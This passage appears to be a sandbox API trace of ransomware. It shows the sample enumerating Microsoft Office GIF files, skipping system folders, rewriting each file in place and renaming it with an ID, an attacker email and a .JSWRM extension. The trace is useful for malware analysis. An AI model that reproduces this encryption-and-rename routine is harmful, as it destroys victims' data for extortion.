lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.245] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x10a0, lpOverlapped=0x0) returned 1 [0120.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.245] CloseHandle (hObject=0x314) returned 1 [0120.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0120.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0120.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0120.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0120.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0120.245] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.245] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR28F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir28f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR28F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir28f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0120.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0120.246] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0120.246] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1444, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR29F.GIF", cAlternateFileName="")) returned 1 [0120.246] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2=".") returned 1 [0120.246] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="..") returned 1 [0120.246] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="...") returned 1 [0120.246] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="windows") returned 1 [0120.246] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="recovery") returned 1 [0120.246] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="perflogs") returned 1 [0120.246] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="documents and settings") returned 1 [0120.247] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.247] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="system volume information") returned 1 [0120.247] lstrcmpiW (lpString1="ZPDIR29F.GIF", lpString2="msocache") returned 1 [0120.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0120.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR29F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR29F.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR29F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0120.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0120.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR29F.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0120.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR29F.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR29F.GIF", lpUsedDefaultChar=0x0) returned 12 [0120.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0120.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.247] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0120.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.247] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0120.247] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR29F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir29f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.248] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5188) returned 1 [0120.248] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.248] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1440) returned 0x24e1d8 [0120.248] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1440, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1440, lpOverlapped=0x0) returned 1 [0120.250] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.250] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1440, lpOverlapped=0x0) returned 1 [0120.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.250] CloseHandle (hObject=0x314) returned 1 [0120.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0120.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0120.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0120.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.250] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0120.250] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.250] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0120.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.251] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0120.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0120.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.251] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR29F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir29f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR29F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir29f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0120.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0120.251] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0120.251] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc49, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR2B.GIF", cAlternateFileName="")) returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2=".") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="..") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="...") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="windows") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="recovery") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="perflogs") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="documents and settings") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="system volume information") returned 1 [0120.252] lstrcmpiW (lpString1="ZPDIR2B.GIF", lpString2="msocache") returned 1 [0120.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0120.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR2B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0120.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0120.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR2B.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0120.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0120.252] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.252] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.252] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0120.252] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.253] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3145) returned 1 [0120.253] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.253] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc40) returned 0x24e1d8 [0120.253] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc40, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0xc40, lpOverlapped=0x0) returned 1 [0120.259] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.259] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0xc40, lpOverlapped=0x0) returned 1 [0120.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.259] CloseHandle (hObject=0x314) returned 1 [0120.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0120.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0120.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0120.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0120.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0120.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0120.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0120.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0120.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0120.259] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0120.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0120.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0120.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0120.260] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xadfda74, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xadfda74, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xadfda74, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x154f, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="ZPDIR2F.GIF", cAlternateFileName="")) returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2=".") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="..") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="...") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="windows") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="recovery") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="perflogs") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="documents and settings") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="system volume information") returned 1 [0120.260] lstrcmpiW (lpString1="ZPDIR2F.GIF", lpString2="msocache") returned 1 [0120.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR2F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0120.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZPDIR2F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZPDIR2F.GIF", lpUsedDefaultChar=0x0) returned 11 [0120.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0120.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0120.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0120.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0120.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0120.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0120.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\ZPDIR2F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\zpdir2f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0120.262] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5455) returned 1 [0120.262] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1540) returned 0x24e1d8 [0120.262] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1540, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x1540, lpOverlapped=0x0) returned 1 [0120.264] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0120.264] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1540, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x1540, lpOverlapped=0x0) returned 1 [0120.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0120.264] CloseHandle (hObject=0x314) returned 1 [0120.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0120.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0120.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0120.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0120.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0120.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0120.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0120.264] RtlAllocateHeap (HeapHandle=0x1e0000, 